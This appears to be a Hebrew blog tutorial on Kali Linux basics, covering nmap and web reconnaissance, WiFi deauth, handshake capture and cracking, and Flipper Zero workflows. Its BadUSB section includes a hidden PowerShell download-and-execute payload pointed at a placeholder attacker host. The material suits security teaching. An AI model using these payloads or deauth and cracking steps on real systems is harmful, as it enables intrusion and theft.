תפריט
דף הבית מאמרים {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} אודות עבדו איתי
Linux terminal with code
אבטחה מרץ 7, 2026 • 25 דקות קריאה

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

שתפו:
Lee Foropoulos

Lee Foropoulos

25 דקות קריאה

Continue where you left off?
Text size:

Contents

מסלול ההאקר: סדרה בת 5 חלקים

חלק 1: מבואחלק 2: שליטה ב-Flipperחלק 3: יסודות Kaliחלק 4: ניצולחלק 5: הביקורת המלאה

בחלקים 1 ו-2, שכפלתם כרטיסים, ניתחתם תדרי רדיו והבנתם למה רוב ה"אבטחה" היא תיאטרון. ראיתם פגיעויות מבחוץ. עכשיו אתם נכנסים פנימה ורואים אותן מנקודת המבט של התוקף.

Kali Linux היא הפצת בדיקות החדירה הסטנדרטית בתעשייה. היא מגיעה עם יותר מ-600 כלי אבטחה מותקנים מראש. זה יכול להרגיש מכריע. רוב המדריכים זורקים אתכם למים העמוקים עם פקודות שאתם לא מבינים ובלי הקשר למה הן חשובות.

אנחנו עושים את זה אחרת. עד סוף המאמר הזה, יהיה לכם מעבדה עובדת, תבינו סיור רשת ברמה בסיסית, ותלכדו את לחיצת היד ה-WiFi הראשונה שלכם. כל שלב בנוי על הקודם.

רוב המדריכים זורקים אתכם למים העמוקים עם פקודות שאתם לא מבינים ובלי הקשר למה הן חשובות. כל שלב כאן בנוי על הקודם.

חלק 1: בניית המעבדה שלכם

בודקי חדירה מקצועיים לא מריצים Kali על המחשב הראשי שלהם. הם משתמשים בסביבות מבודדות שאפשר לאפס, לצלם snapshots ולהרוס בלי להשפיע על המערכת הראשית. תעשו אותו דבר.

אפשרות א: מכונה וירטואלית (מומלץ ללמידה)

מכונה וירטואלית נותנת לכם את סביבת הלמידה הבטוחה ביותר. אתם יכולים לצלם snapshots של ההתקדמות, לעשות טעויות ולחזור אחורה מיד.

מה תצטרכו

  • מחשב מארח: 16GB+ RAM, 50GB+ מקום פנוי בדיסק, מעבד מודרני עם תמיכה ב-virtualization
  • תוכנת וירטואליזציה: VirtualBox (חינם) או VMware Workstation Player (חינם לשימוש אישי)
  • Kali Linux: VM רשמי מוכן מראש מ-kali.org

פרויקט: הגדרת Kali VM

זמן: 30-45 דקות

שלבים:

  1. הורידו את תמונת ה-Kali VM עבור ה-hypervisor שלכם (VirtualBox או VMware)
  2. חלצו את הארכיון שהורדתם (7-Zip מומלץ ל-Windows)
  3. ייבאו את ה-VM ל-hypervisor שלכם
  4. הגדירו משאבים: מינימום 4GB RAM (מומלץ 8GB), 2+ ליבות מעבד
  5. הפעילו את מתאם הרשת במצב "Bridged" לגישה מלאה לרשת
  6. אתחלו את ה-VM והתחברו עם פרטי ברירת המחדל: kali / kali
  7. פתחו טרמינל והריצו: sudo apt update && sudo apt full-upgrade -y
  8. צרו snapshot בשם "Fresh Install" לשחזור קל

אימות הצלחה: אתם יכולים לפתוח טרמינל, להריץ whoami ולראות kali.

אפשרות ב: חומרה ייעודית (לתרגול רציני)

ברגע שאתם מרגישים נוח עם Kali, חומרה ייעודית מסירה את תקורת ה-VM ומאפשרת גישה מלאה לחומרה, מה שחיוני לבדיקות אלחוטיות.

המלצות חומרה

אפשרות חסכוניתThinkPad X230/T430 משומש ($100-150), WiFi של Intel מוחלף ב-Atheros AR9285
אפשרות מודרניתFramework Laptop עם מודול WiFi תואם Linux
חיישן ייעודיRaspberry Pi 5 4GB עם מתאם Alfa AWUS036ACH חיצוני

לעת עתה, VM מושלם. חומרה ייעודית הופכת חשובה כשאתם צריכים monitor mode לבדיקות אלחוטיות (מכוסה בהמשך המאמר).

אפשרות ג: Live USB (אפס שמירה)

Live USB מריץ Kali ישירות בלי התקנה. הכל נעלם כשמכבים. שימושי לבדיקות על חומרה שונה, אבל תאבדו את העבודה בכל הפעלה אלא אם תיצרו מחיצה persistent.

bash
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcher

dd משמיד נתונים

הפקודה dd כותבת ישירות לדיסק בלי אישור. בדקו שלוש פעמים את שם ההתקן. כתיבה להתקן הלא נכון תמחק את כל הכונן לחלוטין.

Kali Linux terminal with security tools running
סביבת Kali Linux מוגדרת כראוי היא הבסיס לכל בדיקת חדירה מקצועית.

חלק 2: החשיבה של הטרמינל

לפני שנוגעים בכלי אבטחה, צריך שתרגישו בנוח בטרמינל. זה לא אופציונלי. ה-GUI קיים ב-Kali, אבל העבודה האמיתית קורית בשורת הפקודה.

ניווט בסיסי

bash
1# Know where you are
2pwd                    # Print working directory
3
4# Move around
5cd /home/kali          # Go to home directory
6cd ..                  # Go up one level
7cd -                   # Go to previous directory
8
9# See what's here
10ls                     # List files
11ls -la                 # List all files with details
12ls -lah                # Human-readable sizes
13
14# Read files
15cat filename           # Display entire file
16less filename          # Scrollable view (q to quit)
17head -n 20 filename    # First 20 lines
18tail -f filename       # Follow file in real-time (logs)

הסלמת הרשאות

כלי אבטחה רבים דורשים גישת root. ב-Kali, sudo נותן לכם הרשאות root זמניות.

bash
1sudo command           # Run single command as root
2sudo -i                # Start root shell (be careful)
3whoami                 # Check current user
4id                     # Show user and group IDs

Root באחריות

הרצה כ-root משמעה אפס רשתות ביטחון. שגיאת הקלדה כמו rm -rf / תשמיד הכל. Kali מודרני מונע את הפקודה הספציפית הזו, אבל העיקרון עומד: תבינו מה אתם מריצים לפני שאתם מריצים את זה.

ניהול תהליכים

bash
1ps aux                 # All running processes
2top                    # Real-time process viewer
3htop                   # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c                 # Stop current process
7ctrl+z                 # Suspend process
8bg                     # Resume in background
9fg                     # Bring to foreground
10
11# Kill processes
12kill PID               # Graceful termination
13kill -9 PID            # Force kill (last resort)

פקודות רשת

bash
1ip a                   # Show network interfaces
2ip route               # Show routing table
3ping -c 4 8.8.8.8     # Test connectivity
4curl ifconfig.me       # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.com

פרויקט: התמצאות בטרמינל

זמן: 15 דקות

משימות:

  1. מצאו את כתובת ה-IP שלכם ברשת המקומית באמצעות ip a
  2. זהו את ברירת המחדל של ה-gateway באמצעות ip route
  3. עשו ping ל-gateway שלכם כדי לאשר קישוריות
  4. הציגו את כל הקבצים ב-/etc ממוינים לפי זמן שינוי: ls -lt /etc | head
  5. קראו את 50 השורות הראשונות של /etc/passwd: head -n 50 /etc/passwd

מטרה: אתם צריכים להיות מסוגלים לנווט, לבדוק סטטוס רשת ולקרוא קבצים בלי לחשוב.

חלק 3: סיור רשת עם Nmap

Nmap (Network Mapper) הוא הכלי החשוב ביותר שתלמדו. הוא מגלה hosts, מזהה שירותים, מאתר מערכות הפעלה וממפה טופולוגיית רשת. כל השאר בנוי על הפלט של nmap.

הסריקה הראשונה שלכם

בואו נסרוק את הרשת שלכם. קודם, זהו את טווח הרשת:

bash
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-255
bash
1# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnet

תראו פלט כזה:

text
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

הסריקה הראשונה הזו אומרת לכם: "ההתקנים האלה קיימים ברשת שלי." עכשיו בואו נשאל שאלות עמוקות יותר.

זיהוי שירותים

ברגע שאתם יודעים אילו hosts קיימים, אתם רוצים לדעת אילו שירותים הם מריצים.

bash
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)

פלט נפוץ:

text
1PORT     STATE SERVICE  VERSION
222/tcp   open  ssh      OpenSSH 8.4p1
380/tcp   open  http     nginx 1.18.0
4443/tcp  open  ssl/http nginx 1.18.0

זיהוי מערכת הפעלה

bash
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1

הבנת מצבי פורטים

Nmap מדווח על פורטים במספר מצבים:

  • open - אפליקציה מקבלת חיבורים באופן פעיל. זה מה שתוקפים מחפשים.
  • closed - הפורט נגיש אבל אין אפליקציה שמאזינה. ה-host פעיל אבל שם אין כלום.
  • filtered - חומת אש או פילטר חוסם את הבדיקה. אי אפשר לקבוע אם פתוח או סגור.
  • unfiltered - הפורט נגיש אבל nmap לא יכול לקבוע אם הוא פתוח או סגור.

סוגי סריקה והתגנבות

bash
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap target

Nmap Scripting Engine (NSE)

ה-NSE מרחיב את nmap עם סקריפטים מתמחים לזיהוי פגיעויות, מנייה של שירותים ועוד.

bash
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20

פרויקט: מפו את הרשת שלכם

זמן: 30 דקות

דרישות מקדימות: הכירו את טווח הרשת שלכם מ-ip a

  1. גלו את כל ה-hosts: sudo nmap -sn YOUR_NETWORK/24
  2. רשמו את ה-hosts שהתגלו ואת כתובות ה-MAC שלהם
  3. בחרו את הראוטר שלכם (בדרך כלל .1) והריצו: sudo nmap -sV -sC YOUR_ROUTER
  4. זהו את כל הפורטים הפתוחים והשירותים בראוטר שלכם
  5. הריצו sudo nmap -A YOUR_COMPUTER כדי לראות מה המחשב שלכם חושף

תיעוד: צרו קובץ טקסט שמפרט כל התקן, כתובת IP שלו, MAC והשירותים. זהו מפת הרשת שלכם.

סרקו רק רשתות שבבעלותכם

סריקת רשתות ללא הרשאה היא לא חוקית ברוב תחומי השיפוט. אפילו סריקת nmap פשוטה יכולה להיחשב כגישה לא מורשית. הישארו ברשת שלכם, בציוד שלכם וברשתות שבהן יש לכם אישור כתוב מפורש.

חלק 4: סיור אינטרנט

סריקת ה-nmap שלכם כנראה מצאה שירותי HTTP (פורטים 80, 443, 8080). בואו נבין מה רץ שם.

Whatweb: זיהוי שירות מהיר

bash
# Identify web technologies
whatweb http://192.168.1.1

דוגמת פלט:

text
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]

Nikto: סורק פגיעויות אינטרנט

bash
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentials

מנייה של תיקיות: מה מוסתר?

שרתי אינטרנט לעתים קרובות מכילים תיקיות שלא מקושרות מהעמוד הראשי: פאנלי ניהול, קבצי הגדרות, קבצי גיבוי.

bash
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

ממצאים נפוצים:

text
1/admin   (Status: 301)
2/backup  (Status: 403)
3/config  (Status: 200)
4/login   (Status: 200)

מיקום Wordlists

Kali כולל wordlists מקיפות ב-/usr/share/wordlists/. התיקיות הנפוצות ביותר: dirb/, dirbuster/, rockyou.txt (סיסמאות), ו-seclists/ (אוסף מקיף).

פרויקט: בדקו את ממשק האינטרנט של הראוטר

זמן: 20 דקות

  1. הריצו whatweb http://YOUR_ROUTER_IP כדי לזהות את השרת
  2. הריצו nikto -h http://YOUR_ROUTER_IP כדי לבדוק פגיעויות
  3. הריצו gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. בקרו בתיקיות שהתגלו בדפדפן
  5. רשמו פאנלי ניהול, מספרי גרסאות או ממצאים מעניינים

ממצא נפוץ: עמודי ניהול ראוטר חשופים עם credentials ברירת מחדל.

Server room with network infrastructure
סיור רשת חושף את הטופולוגיה המלאה של סביבת היעד, מראוטרים ועד שירותים מוסתרים.

חלק 5: סיור אלחוטי

כאן הדברים נהיים מעניינים. רשתות WiFi משדרות כל הזמן, ועם הכלים הנכונים, אתם יכולים ללכוד לחיצות יד אימות: ההחלפה המוצפנת שקורית כשהתקן מתחבר.

דרישות חומרה

ה-WiFi המובנה שלכם כנראה לא יעבוד לזה. אתם צריכים מתאם שתומך ב-monitor mode וב-packet injection. מומלץ: Alfa AWUS036ACH ($50) או Alfa AWUS036ACM ($45). אלה עובדים מהקופסה עם Kali.

הבנת Monitor Mode

מצב WiFi רגיל ("managed mode") מקבל רק חבילות שמיועדות להתקן שלכם. Monitor mode לוכד את כל החבילות בטווח, התעבורה של כל התקן בערוץ.

bash
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0mon

סריקה לרשתות

bash
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID  = Router MAC address
6# PWR    = Signal strength (higher = closer)
7# CH     = Channel
8# ENC    = Encryption (WPA2, WPA3, OPN)
9# ESSID  = Network name
10
11# Press Ctrl+C to stop

מה שאתם רואים הוא כל רשת WiFi בטווח, הגדרות האבטחה שלהן, ולעתים קרובות ההתקנים המחוברים אליהן. זה מה ש-war driver רואה כשהוא סורק שכונות.

לכידת Handshake

כשהתקן מתחבר לרשת WPA2, יש four-way handshake. אם תלכדו את ה-handshake הזה, תוכלו לנסות לפצח את הסיסמה offline.

bash
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshake

כשתלכדו handshake, airodump-ng מציג [ WPA handshake: XX:XX:XX:XX:XX:XX ] בפינה הימנית העליונה.

התקפות Deauth הן לא חוקיות

שליחת חבילות deauthentication לרשתות שאינן בבעלותכם היא עבירה פדרלית על פי ה-Computer Fraud and Abuse Act (בארה"ב) וחוקים דומים במקומות אחרים. בדקו רק ברשת שלכם. המטרה היא להבין את הפגיעות, לא לתקוף אחרים.

פיצוח ה-Handshake

עם handshake שנלכד, אתם יכולים לנסות לפצח את הסיסמה offline באמצעות wordlist:

bash
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
סיסמאות אמיתיות מפריצות נתונים אמיתיות כלולות ב-rockyou.txt, ה-wordlist ברירת המחדל שמשמשת לפיצוח WiFi handshakes שנלכדו.

בדיקת מציאות חוזק סיסמאות

rockyou.txt מכיל 14+ מיליון סיסמאות מפריצות נתונים אמיתיות. אם סיסמת ה-WiFi שלכם היא "password123" או "summer2024" או שם הכלב שלכם, אפשר לפצח אותה בשניות. סיסמה אקראית של 12+ תווים תיקח מיליוני שנים ל-brute-force.

פרויקט: בדקו את אבטחת ה-WiFi שלכם

זמן: 45 דקות

דרישות מקדימות: מתאם WiFi חיצוני עם תמיכה ב-monitor mode

  1. הפעילו monitor mode: sudo airmon-ng start wlan0
  2. סרקו רשתות: sudo airodump-ng wlan0mon
  3. רשמו את הערוץ וה-BSSID של הרשת שלכם
  4. לכדו בערוץ שלכם: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. חברו מחדש התקן ל-WiFi שלכם (או השתמשו ב-deauth ברשת שלכם בלבד)
  6. אשרו לכידת handshake
  7. בדקו מול rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

תוצאה: אם הסיסמה שלכם נמצאה, שנו אותה מיד למשהו אקראי וארוך (20+ תווים).

חלק 6: חיבור ה-Flipper Zero שלכם

זוכרים את כל הלכידות מחלק 2? בואו נשלב אותן בזרימת העבודה שלכם עם Kali.

העברת קבצים

bash
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/       # Sub-GHz captures
9/mnt/flipper/nfc/          # NFC dumps
10/mnt/flipper/infrared/     # IR captures
11/mnt/flipper/lfrfid/       # 125kHz RFID
12/mnt/flipper/badusb/       # BadUSB scripts

ניתוח NFC Dumps

bash
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | less

ניתוח Sub-GHz

bash
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)

פיתוח BadUSB

צרו payloads של BadUSB ב-Kali, בדקו אותם ב-Flipper:

bash
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/

Payloads של BadUSB הם עוצמתיים

הסקריפטים האלה מתבצעים אוטומטית כשמחברים אותם. payload זדוני יכול להתקין backdoors, לגנוב credentials או להשמיד נתונים בשניות. השתמשו רק במכונות שלכם לבדיקות. לעולם אל תשאירו את ה-Flipper שלכם במקום שמישהו אחר עלול לחבר אותו.

חלק 7: תיעוד וזרימת עבודה

בודקי חדירה מקצועיים לא רק מריצים כלים. הם מתעדים הכל. תיעוד טוב מפריד בין חובבנים למקצוענים.

רישום הערות עם CherryTree

bash
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitation

שמירת פלט Nmap

bash
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml  (parseable)
7# scan_results.gnmap (greppable)

רישום הפעלה

bash
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop logging

מסלול ההאקר

סדרה בת 5 חלקים שלוקחת אתכם מסקרנים למסוגלים.

חלק 1: מבוא חלק 2: שליטה ב-Flipper חלק 3: יסודות Kali ✓ חלק 4: ניצול חלק 5: ביקורת מלאה

רשימת בדיקה לחלק 3

☐ הגדרת מעבדה: Kali VM רץ, מעודכן, snapshot נשמר

☐ טרמינל: נוח עם ניווט, הרשאות, שליטה בתהליכים

☐ Nmap: רשת ממופה, שירותים מזוהים, ראוטר נסרק

☐ סיור אינטרנט: ממשק אינטרנט של ראוטר נותח עם whatweb/nikto

☐ אלחוטי: Monitor mode מופעל, רשתות נסרקו

☐ Handshake: WiFi handshake של עצמכם נלכד ונבדק

☐ Flipper: קבצים הועברו, זרימת עבודה מובנת

☐ תיעוד: הערות מאורגנות, סריקות נשמרו

תוכנית פעולה ליסודות Kali 0/6

מה הלאה

בניתם את המעבדה שלכם ולמדתם את שלב הסיור. אתם יכולים לגלות hosts, לזהות שירותים וללכוד handshakes אלחוטיים. אתם מבינים מה תוקפים רואים כשהם מסתכלים על רשת.

בחלק 4, עוברים מסיור לניצול. תלמדו:

  • Metasploit Framework, האולר השוויצרי של הניצול
  • זרימות עבודה נפוצות לניצול פגיעויות
  • טכניקות post-exploitation: מה קורה אחרי הגישה הראשונית
  • הסלמת הרשאות: מעבר ממשתמש רגיל למנהל
  • Pivoting: שימוש במערכת שנפרצה כדי לתקוף אחרות

הסיור אומר לכם איפה הדלתות. הניצול מלמד אתכם איך לעבור דרכן.

מיפיתם את השטח. עכשיו אתם לומדים לנווט בו. חלק 4 לוקח אתכם מצופה למפעיל.

נתראה בחלק 4.

How was this article?

שתפו

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Al tachmits af post

Qabel hodaot keshemashmim maamarim chadashim. Lo dorshim email.

Tire banner baatar keshemashmim maamar chadash, vetodaa medafdefan im teashru.

Hodaot defdefan bilvad. Beli spam, beli email.

0 / 0